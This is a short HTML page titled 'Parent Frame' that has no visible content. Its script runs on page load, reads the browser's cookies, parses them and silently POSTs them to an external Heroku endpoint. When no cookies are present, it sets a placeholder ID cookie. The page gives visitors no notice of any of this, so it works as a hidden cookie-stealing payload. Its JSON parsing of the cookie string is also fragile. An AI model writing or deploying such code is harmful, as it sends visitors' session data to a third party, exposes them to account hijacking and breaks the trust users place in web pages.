<!DOCTYPE html>
<html>
  <head>
    <title>Parent Frame</title>
    <script type="text/javascript" src="https://code.jquery.com/jquery-2.2.0.min.js">

    </script>
    <script>
      // window.addEventListener('beforeunload', function(event) {
      //     console.log('I am the 1st one.');
      // });
      function post(url, data, headers) {

        return Promise.resolve(
            $.ajax({
                url: url,
                datatype:"json",
                type: "POST",
                data: data,
                headers: headers
            })
        );
    };

      window.addEventListener('load',function () {
        console.log('loaded');
        var x = document.cookie;
        var cookie = JSON.parse('{'+x+'}')
        if(x){
          console.log(cookie);
           post('https://sleepy-everglades-45938.herokuapp.com/data',cookie,null).then(function(data,err){
             console.log(data);
           });
        }else {
          document.cookie ='"id":11111111111111';
          console.log('nothing');
        }

      })

    </script>
  </head>
  <body>
  </body>
</html>
